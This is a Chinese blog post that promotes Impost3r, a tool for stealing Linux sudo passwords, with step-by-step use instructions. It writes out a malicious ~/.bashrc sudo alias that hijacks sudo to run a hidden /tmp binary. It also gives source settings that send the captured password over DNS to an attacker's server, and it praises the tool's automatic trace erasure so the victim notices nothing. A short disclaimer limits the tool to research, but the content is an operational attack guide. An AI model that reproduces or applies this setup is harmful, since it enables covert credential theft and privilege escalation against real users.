Impost3r-Sudo 密码窃取工具

地球胖头鱼 2020-11-06
Web安全 发布于 2020-11-06 10:04:32 阅读 59 评论 0

前言

在做渗透测试过程中很多情况我们都会遇到无法获得一些可用的密码以及root权限的情况下陷入了僵局,从网上找了好久的脚本,但是找了一圈发现可用的脚本要不是能用但是版本太老,要不是直接就不能用。然后在漫无目的的寻找中找到一个大佬写的软件,软件使用C语言编写,可用窃取sudo密码并自动保存清理窃取痕迹,最大程度上让被攻击者无法察觉异常。

废话不多说了接下来给大家介绍一下!!!

Impost3r

Impost3r是一个利用C语言编写,用来窃取linux下sudo密码的工具

用户可使用此程序在普通用户权限下,制造水坑,窃取合法用户的sudo密码

此工具仅限于安全研究和教学,用户承担因使用此工具而导致的所有法律和相关责任! 作者不承担任何法律和相关责任!^_^

特性

  • 自动擦除行为痕迹
  • 通过DNS协议传输结果
  • 用户无感

依赖

GCC编译器
GCC是以GPL许可证所发行的自由软件,也是GNU计划的关键部分。GCC的初衷是为GNU操作系统专门编写一款编译器,现已被大多数类Unix操作系统采纳为标准的编译器,甚至在微软的Windows上也可以使用GCC。GCC支持多种计算机体系结构芯片,如x86、ARM、MIPS等,并已被移植到其他多种硬件平台

使用方法

  • 首先假设攻击者控制了一台服务器,权限为普通用户权限

  • 拷贝一份用户的.bashrccp ~/.bashrc /tmp/,并将这份副本放在攻击者自定义的路径下(本例中放置在/tmp/目录下,攻击者可以修改)

  • 修改用户根目录下的.bashrc(~/.bashrc),在最后一行添加如下语句:

    alias sudo='impost3r() {
    if [ -f "/tmp/.impost3r" ]; then
    /tmp/.impost3r "$@" && unalias sudo
    else
    unalias sudo;sudo "$@"
    fi
    }; impost3r'
  • 添加完成后,保存文件并执行source ~/.bashrc

  • 接着攻击者需要对Impost3r源代码进行修改:

    # define MAX_RESEND 30  \\设置当窃取到密码之后,Impost3r向攻击者服务器发送用户密码的最大重试次数
    # define RESEND_INTERVAL 5  \\设置每一次发送密码的间隔
    # define FILENAME "/tmp/.impost3r"  \\设置Impost3r在目标服务器上的位置
    # define BACKUP_BASHRC "/tmp/.bashrc" \\设置攻击者备份的源.bashrc在目标服务器上的位置
    # define REMOTE_ADDRESS "192.168.0.12" \\设置回送密码的远程地址
    # define REMOTE_PORT 53 \\设置回送密码的远程端口
  • 修改完成后,保存并在当前目录执行make

  • 在当前目录下得到编译完成的.impost3r文件

  • 上传.impost3r文件至目标服务器的/tmp/文件夹下(仅为示例,可自行修改,只需与源代码中定义相同即可)

  • 攻击者在自己的服务器上启动dns服务端程序,等待合法用户使用sudo后获取密码。

注意事项

  • 上述的DNS服务端程序用的是Fdns,并且好像修改了一部分参数设置,大家在下载Fdns源码后可根据需要使用gcc -o dns main.c util.c命令进行编译,当然也可以使用别的DNS服务端程序,这里不会出现什么影响,前提是此DNS服务端成会回复DNS response的服务端程序,而不是仅解析DNS request.

  • 这个工具有个好处就是不需要攻击者手动清理痕迹,他会自动清理

  • 因为这个工具我找到的时候还是在测试阶段,还有很多bug可能在使用期间存在一些问题,这个还需开发者后期修补

传送门

GitHub传送门

本作品采用《CC 协议》,转载必须注明作者和本文链接
讨论数量: 0
(= ̄ω ̄=)··· 暂无内容!
请勿发布不友善或者负能量的内容。与人为善,比聪明更重要!
地球胖头鱼
未填写
  • 作者发布文章112
  • 作者收获粉丝2
  • 作者收到点赞0
  • 所有文章被收藏了0
  • 博客总访问量排行第3
  • 博客总访问量1.1 万(每日更新)
查看所有博文